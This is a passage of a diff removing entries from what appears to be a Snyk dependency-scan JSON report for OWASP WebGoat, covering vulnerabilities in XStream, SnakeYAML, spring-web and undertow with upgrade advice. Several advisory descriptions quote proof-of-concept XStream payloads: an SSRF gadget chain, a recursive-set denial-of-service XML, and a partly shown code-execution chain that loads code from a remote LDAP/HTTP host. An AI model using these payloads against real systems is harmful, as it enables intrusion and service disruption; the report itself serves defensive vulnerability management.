\u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object i",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000001c-0000-4000-8000-00000000001c",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 514
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "0000001c-0000-4000-8000-00000000001c",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.17"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000001c-0000-4000-8000-00000000001c",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fe215b33fbc68ab1a6aa526e00ca607926bb3737)\n- [GitHub Issue](https://github.com/x-stream/xstream/issues/314)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000001d-0000-4000-8000-00000000001d",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 53
-            }
-          },
-          "title": "Denial of Service (DoS)"
-        },
-        "id": "0000001d-0000-4000-8000-00000000001d",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.20"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000001d-0000-4000-8000-00000000001d",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.\r\n\r\n## Workaround\r\n\r\nThis effects of this vulnerability can be avoided by catching the StackOverflowError in the calling application.\r\n\r\n## PoC\r\n\r\nCreate a simple HashSet and use XStream to marshal it to XML.  Replace the XML with following snippet and unmarshal it with XStream.\r\n\r\n```xml\r\n\u003cdiv class=\"Source XML\"\u003e\u003cpre\u003e\r\n\u003cset\u003e\r\n  \u003cset\u003e\r\n    \u003cset\u003e\r\n      \u003cset\u003e\r\n        \u003cset\u003e\r\n          \u003cset\u003e\r\n            \u003cstring\u003ea\u003c/string\u003e\r\n          \u003c/set\u003e\r\n          \u003cset\u003e\r\n            \u003cstring\u003eb\u003c/string\u003e\r\n          \u003c/set\u003e\r\n        \u003c/set\u003e\r\n        \u003cset\u003e\r\n          \u003cstring\u003ec\u003c/string\u003e\r\n          \u003cset reference='../../../set/set[2]'/\u003e\r\n        \u003c/set\u003e\r\n      \u003c/set\u003e\r\n    \u003c/set\u003e\r\n  \u003c/set\u003e\r\n\u003c/set\u003e;\r\n\u003c/pre\u003e\u003c/div\u003e\r\n\u003cdiv class=\"Source Java\"\u003e\u003cpre\u003eXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n\u003c/pre\u003e\u003c/div\u003e\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.20 or higher.\n## References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/e9151f221b4969fb15b1e946d5d61dcdd459a391)\n- [XStream Advisory](http://x-stream.github.io/CVE-2022-41966.html)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000001e-0000-4000-8000-00000000001e",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 184
-            }
-          },
-          "title": "Denial of Service (DoS)"
-        },
-        "id": "0000001e-0000-4000-8000-00000000001e",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.20"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000001e-0000-4000-8000-00000000001e",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='javax.activation.URLDataSource'\u003e\r\n                \u003curl\u003ehttp://localhost:8080/internal/:\u003c/url\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21342.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000001f-0000-4000-8000-00000000001f",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 142
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
-        },
-        "id": "0000001f-0000-4000-8000-00000000001f",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "0000001f-0000-4000-8000-00000000001f",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n        \u003cm__obj class='string'\u003ecom.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: \u0026#x3C;none\u0026#x3E;\u003c/m__obj\u003e\r\n      \u003c/value\u003e\r\n    \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n        \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n          \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n          \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n          \u003cbodyParts/\u003e\r\n          \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n            \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n            \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n              \u003csoapPart/\u003e\r\n              \u003cmm\u003e\r\n                \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                  \u003caliases class='com.sun.jndi.ldap.LdapBindingEnumeration'\u003e\r\n                    \u003chomeCtx\u003e\r\n                      \u003chostname\u003e233.233.233.233\u003c/hostname\u003e\r\n                      \u003cport__number\u003e2333\u003c/port__number\u003e\r\n                      \u003cclnt class='com.sun.jndi.ldap.LdapClient'/\u003e\r\n                    \u003c/homeCtx\u003e\r\n                    \u003chasMoreCalled\u003etrue\u003c/hasMoreCalled\u003e\r\n                    \u003cmore\u003etrue\u003c/more\u003e\r\n                    \u003cposn\u003e0\u003c/posn\u003e\r\n                    \u003climit\u003e1\u003c/limit\u003e\r\n                    \u003centries\u003e\r\n                      \u003ccom.sun.jndi.ldap.LdapEntry\u003e\r\n                        \u003cDN\u003euid=songtao.xu,ou=oa,dc=example,dc=com\u003c/DN\u003e\r\n                        \u003cattributes class='javax.naming.directory.BasicAttributes' serialization='custom'\u003e\r\n                          \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                            \u003cdefault\u003e\r\n                              \u003cignoreCase\u003efalse\u003c/ignoreCase\u003e\r\n                            \u003c/default\u003e\r\n                            \u003cint\u003e4\u003c/int\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                  \u003cattrID\u003eobjectClass\u003c/attrID\u003e\r\n                                \u003c/default\u003e\r\n                                \u003cint\u003e1\u003c/int\u003e\r\n                                \u003cstring\u003ejavanamingreference\u003c/string\u003e\r\n                              \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                  \u003cattrID\u003ejavaCodeBase\u003c/attrID\u003e\r\n                                \u003c/default\u003e\r\n                                \u003cint\u003e1\u003c/int\u003e\r\n                                \u003cstring\u003ehttp://127.0.0.1:2333/\u003c/string\u003e\r\n                              \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                  \u003cattrID\u003ejavaClassName\u003c/attrID\u003e\r\n                                \u003c/default\u003e\r\n                                \u003cint\u003e1\u003c/int\u003e\r\n                                \u003cstring\u003erefClassName\u003c/string\u003e\r\n                              \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                       ",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000020-0000-4000-8000-000000000020",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 274
-            }
-          },
-          "title": "Arbitrary Code Execution"
-        },
-        "id": "00000020-0000-4000-8000-000000000020",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "com.thoughtworks.xstream:xstream",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000020-0000-4000-8000-000000000020",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.yaml:snakeyaml](https://code.google.com/p/snakeyaml/source/browse/) is a YAML 1.1 parser and emitter for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution in the `Constructor` class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the `SafeConstructor` class. \r\n\r\nThe maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.\n## Remediation\nUpgrade `org.yaml:snakeyaml` to version 2.0 or higher.\n## References\n- [BitBucket Changelog](https://bitbucket.org/snakeyaml/snakeyaml/wiki/Changes)\n- [Bitbucket Commit](https://bitbucket.org/snakeyaml/snakeyaml/commits/2b8d47c8bcfd402e7a682b7b2674e8d0cb25e522)\n- [Bitbucket Issue](https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in)\n- [BitBucket Issue](https://bitbucket.org/snakeyaml/snakeyaml/issues/565/do-not-allow-global-tags-by-default)\n- [BitBucket PR](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/39)\n- [BitBucket PR](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44)\n- [PoC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC)\n- [Snyk Blog - Technical Deepdive](https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/)\n- [Vulnerable Class](https://github.com/snakeyaml/snakeyaml/blob/master/src/main/java/org/yaml/snakeyaml/constructor/Constructor.java)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.yaml:snakeyaml",
-                  "version": "1.33"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000021-0000-4000-8000-000000000021",
-          "locations": [
-            {
-              "package": {
-                "name": "org.yaml:snakeyaml",
-                "version": "1.33"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 423
-            }
-          },
-          "title": "Arbitrary Code Execution"
-        },
-        "id": "00000021-0000-4000-8000-000000000021",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.yaml:snakeyaml",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.2.0"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.2.0"
-                        },
-                        {
-                          "name": "org.yaml:snakeyaml",
-                          "version": "2.2"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000021-0000-4000-8000-000000000021",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 6.1.14 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000022-0000-4000-8000-000000000022",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-web",
-                "version": "6.0.13"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "low"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 31
-            }
-          },
-          "title": "Improper Handling of Case Sensitivity"
-        },
-        "id": "00000022-0000-4000-8000-000000000022",
-        "links": {},
-        "relationships": {
-          "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-web",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.2.11"
-                        },
-                        {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.1.14"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
-              },
-              "id": "00000022-0000-4000-8000-000000000022",
-              "type": "fixes"
-            }
-          }
-        },
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests that exceed the configured `max-header-size` attribute in `ajp-listener`, leading to the server closing the TCP connection without returning an AJP response.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the `max-header-size` is set to 64 KB or less.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2242099)\n",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000023-0000-4000-8000-000000000023",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 100
-            }
-          },
-          "title": "Allocation of Resources Without Limits or Throttling"
